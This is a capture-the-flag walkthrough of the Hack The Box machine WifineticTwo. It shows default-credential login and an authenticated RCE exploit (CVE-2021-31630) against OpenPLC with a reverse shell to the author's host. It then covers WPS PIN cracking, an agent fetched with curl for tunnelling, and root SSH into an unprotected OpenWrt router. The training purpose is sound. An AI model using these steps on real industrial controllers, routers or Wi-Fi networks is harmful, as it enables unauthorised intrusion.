# HTB - WifineticTwo

<figure><img src="/files/qoqw7Sqbnu73HJwZyYqU" alt=""><figcaption></figcaption></figure>

## Machine Info

WifineticTwo is a medium-difficulty Linux machine that features OpenPLC running on port 8080, vulnerable to Remote Code Execution through the manual exploitation of `CVE-2021-31630`. After obtaining an initial foothold on the machine, a WPS attack is performed to acquire the Wi-Fi password for an Access Point (AP). This access allows the attacker to target the router running `OpenWRT` and gain a root shell via its web interface.

## Enumeration

***

**Scope**

> IP Address: 10.10.11.7

**Nmap Scan**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack
8080/tcp open  http-proxy syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy Werkzeug/1.0.1 Python/2.7.18
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login
<SNIP>
```

```
* Open ports: 22 - 8080
* Services: SSH - HTTP
* Important notes: openPLC
```

```bash
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/CVE-2021-31630-HTB]
└─$ sudo sh -c "echo  '$ip wifinetictwo.htb' >> /etc/hosts"

┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/CVE-2021-31630-HTB]
└─$ tail -n1 /etc/hosts
10.10.11.7 wifinetictwo.htb
```

`http://10.10.11.7:8080/login`

<figure><img src="/files/PaaJD0c1AisALfhOoxmR" alt=""><figcaption></figcaption></figure>

A quick search for `OpenPLC` CVEs:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ searchsploit OpenPLC                        
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                             |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenPLC 3 - Remote Code Execution (Authenticated)                                                                                                          | python/webapps/49803.py
OpenPLC WebServer 3 - Denial of Service                                                                                                                    | multiple/dos/51746.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
```

## Initial Access

I don't have credentials yet, so I tried the default ones, `openplc:openplc`, and they worked.

<figure><img src="/files/ckYNZAH98wSi5CWehtxh" alt=""><figcaption></figcaption></figure>

`http://10.10.11.7:8080/dashboard`

<figure><img src="/files/Yv2CJhSmPXhJrZTVBny5" alt=""><figcaption></figcaption></figure>

The exploit we found requires credentials; now that I have them, I can run it.

{% embed url="<https://github.com/thewhiteh4t/cve-2021-31630>" %}

```bash
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ git clone https://github.com/thewhiteh4t/cve-2021-31630.git
<snip>

┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/cve-2021-31630]
└─$ python3 cve_2021_31630.py -u openplc -p openplc -lh 10.10.16.7 -lp 443 http://10.10.11.7:8080

------------------------------------------------
--- CVE-2021-31630 -----------------------------
--- OpenPLC WebServer v3 - Authenticated RCE ---
------------------------------------------------
[>] Found By : Fellipe Oliveira
[>] PoC By   : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
[>] Target   : http://10.10.11.7:8080
[>] Username : openplc
[>] Password : openplc
[>] Timeout  : 200 secs
[>] LHOST    : 10.10.16.7
[>] LPORT    : 443

[!] Checking status...
[+] Service is Online!
[!] Logging in...
[+] Logged in!
[!] Restoring default program...
[+] PLC Stopped!
[+] Cleanup successful!
[!] Uploading payload...
[+] Payload uploaded!
[+] Waiting for 5 seconds...
[+] Compilation successful!
[!] Starting PLC...
[+] PLC Started! Check listener...
[!] Cleaning up...
[+] PLC Stopped!
[+] Cleanup successful! 
```

Catch the connection on the listener

```bash
┌──(kali㉿kali)-[~/study/Courses/HackThebox/HTB/machines/WifineticTwo]
└─$ nc -lvnp 443                                                                                                                                                                             
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.7] 47504
id
uid=0(root) gid=0(root) groups=0(root)  
```

Upgrade the shell

```bash
script /dev/null -c bash
Ctrl+z
stty -echo raw; fg
reset
Terminal type? screen
stty rows 37 columns 189
export TERM=xterm-256color
```

I found myself running commands as `root`, so I'm probably inside a Docker container or some other kind of virtualization.

The user flag is in the `/root` directory

```bash
root@attica01:/# ls /root
user.txt
root@attica01:~# cat user.txt 
850e68329cf676exxxxxxxxxxxxxxxx
```

> User Flag: 850e68329cf676exxxxxxxxxxxxxxxx

***

## Privilege Escalation

The machine's IP address (10.10.11.7) is not on any interface here, which confirms I'm not on the actual host. There is also a `wlan0` interface.

```bash
root@attica01:/# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.3.2  netmask 255.255.255.0  broadcast 10.0.3.255
        inet6 fe80::216:3eff:fefc:910c  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:fc:91:0c  txqueuelen 1000  (Ethernet)
        RX packets 5716  bytes 529625 (529.6 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4286  bytes 1207374 (1.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 715  bytes 39478 (39.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 715  bytes 39478 (39.4 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 02:00:00:00:02:00  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```

I uploaded `linpeas.sh` to the box to enumerate it and collect useful information, but didn't find anything interesting.

`linpeas.sh` does tell me that it's a virtual machine (`lxc`):

```bash
═╣ Is this a virtual machine? ..... Yes (lxc) 
```

Enumerating the installed packages shows that there are wireless tools here:

```bash
root@attica01:~$ apt list --installed | cut -d"/" -f1,3

<snip>
whiptail
wireless-regdb
wireless-tools
wpasupplicant
<snip>
```

Following this post, I was able to work with the wireless interface on that host:

{% embed url="<https://www.yeahhub.com/connect-wifi-network-terminal-kali-linux/>" %}

```bash
root@attica01:~$ iw wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
        last seen: 4928.704s [boottime]
        TSF: 1721706237223201 usec (19927d, 03:43:57)
        freq: 2412
        beacon interval: 100 TUs
        capability: ESS Privacy ShortSlotTime (0x0411)
        signal: -30.00 dBm
        last seen: 0 ms ago
        Information elements from Probe Response frame:
        SSID: plcrouter
        Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 
        DS Parameter set: channel 1
        ERP: Barker_Preamble_Mode
        Extended supported rates: 24.0 36.0 48.0 54.0 
        RSN:     * Version: 1
                 * Group cipher: CCMP
                 * Pairwise ciphers: CCMP
                 * Authentication suites: PSK
                 * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
        Supported operating classes:
                 * current operating class: 81
        Extended capabilities:
                 * Extended Channel Switching
                 * SSID List
                 * Operating Mode Notification
        WPS:     * Version: 1.0
                 * Wi-Fi Protected Setup State: 2 (Configured)
                 * Response Type: 3 (AP)
                 * UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
                 * Manufacturer:  
                 * Model:  
                 * Model Number:  
                 * Serial Number:  
                 * Primary Device Type: 0-00000000-0
                 * Device name:  
                 * Config methods: Label, Display, Keypad
                 * Version2: 2.0
```
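The scan output above is also what a defender would audit: the AP advertises WPA2-PSK plus WPS in state 2 (Configured) with PIN-based config methods (Label, Display, Keypad), which is exactly the combination the next step abuses. The following is an added example, not part of the original writeup: a small Python parser for `iw ... scan` output, with the security-relevant lines above embedded as constructed sample input, that extracts each BSS's SSID, authentication suite and WPS state and flags APs that expose a WPS PIN method.

```python
import re

# Constructed sample input: the security-relevant lines of the `iw wlan0 scan` output above.
SAMPLE_SCAN = """\
BSS 02:00:00:00:01:00(on wlan0)
        SSID: plcrouter
        RSN:     * Version: 1
                 * Authentication suites: PSK
        WPS:     * Version: 1.0
                 * Wi-Fi Protected Setup State: 2 (Configured)
                 * Config methods: Label, Display, Keypad
"""

# WPS config methods that involve an 8-digit PIN (PushButton is the PBC method).
PIN_METHODS = {"Label", "Display", "Keypad"}

def parse_iw_scan(text):
    """Split `iw <dev> scan` output into one dict per BSS, keeping the security fields."""
    networks, cur = [], None
    for line in text.splitlines():
        m = re.match(r"BSS ([0-9a-f:]{17})", line)
        if m:  # a new BSS block; the indented lines that follow belong to it
            cur = {"bssid": m.group(1), "ssid": None, "akm": None,
                   "wps_state": None, "wps_methods": []}
            networks.append(cur)
        elif cur is not None:
            s = line.strip()
            if s.startswith("SSID: "):
                cur["ssid"] = s[len("SSID: "):]
            elif s.startswith("* Authentication suites:"):   # inside the RSN element
                cur["akm"] = s.split(":", 1)[1].strip()
            elif s.startswith("* Wi-Fi Protected Setup State:"):  # inside the WPS element
                cur["wps_state"] = s.split(":", 1)[1].strip()
            elif s.startswith("* Config methods:"):
                cur["wps_methods"] = [x.strip() for x in s.split(":", 1)[1].split(",")]
    return networks

def audit(net):
    """Findings a defender would raise for one BSS, based only on its advertised IEs."""
    findings = []
    if (net["wps_state"] or "").startswith("2"):  # state 2 = Configured
        findings.append("WPS is configured and enabled")
        if PIN_METHODS & set(net["wps_methods"]):
            findings.append("WPS PIN methods advertised: disable WPS, or at least the PIN method")
    return findings

print([(n["ssid"], n["akm"], audit(n)) for n in parse_iw_scan(SAMPLE_SCAN)])
```

Feed it the full output of `iw wlan0 scan` (all BSS blocks are handled) to get the same findings for every AP in range.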

I got a hint from the community about the `oneshot` tool, which attacks WPS by guessing the PIN (the output below shows it succeeding with the default PIN `12345670`).

```bash
root@attica01:~$ python3 oneshot.py -i wlan0
[*] Running wpa_supplicant…
[*] BSSID not specified (--bssid) — scanning for available networks
Networks list:
#    BSSID              ESSID                     Sec.     PWR  WSC device name             WSC model
1)   02:00:00:00:01:00  plcrouter                 WPA2     -30                                 
Select target (press Enter to refresh): 1   
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WPS Message M3
[*] Sending WPS Message M4…
[*] Received WPS Message M5
[+] The first half of the PIN is valid
[*] Sending WPS Message M6…
[*] Received WPS Message M7
[+] WPS PIN: '12345670'
[+] WPA PSK: 'NoWWEDoKnowWhaxxxxxxxxxxx'
[+] AP SSID: 'plcrouter'
```

Connect to the `plcrouter` network

```bash
root@attica01:~$ wpa_passphrase plcrouter >> /etc/wpa_supplicant/wpa_supplicant.conf                                                
# reading passphrase from stdin
NoWWEDoKnowWhaxxxxxxxxxxx

root@attica01:~$ wpa_supplicant -B -D wext -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf

Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
ioctl[SIOCSIWENCODEEXT]: Invalid argument
ioctl[SIOCSIWENCODEEXT]: Invalid argument
```

Verify successful connection

```bash
root@attica01:~# iw wlan0 link
Connected to 02:00:00:00:01:00 (on wlan0)
        SSID: plcrouter
        freq: 2412
        RX: 16029 bytes (229 packets)
        TX: 1116 bytes (11 packets)
        signal: -30 dBm
        rx bitrate: 1.0 MBit/s
        tx bitrate: 12.0 MBit/s

        bss flags:      short-slot-time
        dtim period:    2
        beacon int:     100
```

But I didn't get an IP address:

```bash
root@attica01:~# ip addr show wlan0
5: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
    inet6 fe80::ff:fe00:200/64 scope link 
       valid_lft forever preferred_lft forever
```

So I add one manually.

> I wasn't sure which CIDR range to assign to the interface, so I decided to just give it a try.

```bash
root@attica01:~$ ifconfig wlan0 192.168.1.5 netmask 255.255.255.0
root@attica01:~$ ifconfig wlan0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.5  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::ff:fe00:200  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:02:00  txqueuelen 1000  (Ethernet)
```

I set up a tunnel with ligolo-ng to enumerate the new network from my Kali machine.

```bash
┌──(kali㉿kali)-[~/…/Tools/Pivot/ligolo-ng]
└─$ ./proxy-server -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended) 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

Made in France ♥ by @Nicocha30!

ligolo-ng »
```

```bash
root@attica01:~$ curl 10.10.16.7/agent.sh -o agent.sh
root@attica01:~$ chmod +x agent.sh
root@attica01:~$ ./agent.sh -connect 10.10.16.7:11601 -ignore-cert
```

```bash
ligolo-ng » session
1
ligolo-ng » start
```

Add a route for the network via the ligolo interface and ping-sweep it with fping:

```bash
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ sudo ip route add 192.168.1.0/24 dev ligolo

┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ fping -asgq 192.168.1.0/24

192.168.1.1
192.168.1.5
```

192.168.1.5 is the IP I assigned to the wlan0 interface, so the target is 192.168.1.1.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ nmap 192.168.1.1 -F -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 00:19 EDT
Nmap scan report for 192.168.1.1
Host is up (0.10s latency).
Not shown: 92 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
7/tcp     filtered echo
22/tcp    open     ssh
53/tcp    open     domain
80/tcp    open     http
443/tcp   open     https
514/tcp   filtered shell
2001/tcp  filtered dc
49154/tcp filtered unknown
```

SSH is open, so I tried connecting as root; as the banner shows, the device has no root password set.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ ssh root@192.168.1.1                       
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
ED25519 key fingerprint is SHA256:ZcoOrJ2dytSfHYNwN2vcg6OsZjATPopYMLPVYhczadM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (ED25519) to the list of known hosts.

BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash)

  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 OpenWrt 23.05.2, r23630-842932a63d
 -----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
root@ap:~# 
```

```bash
root@ap:~$ cat root.txt 
bd361577bf4d8653xxxxxxxxxxxxxxxx
```

> Root Flag: bd361577bf4d8653xxxxxxxxxxxxxxxx
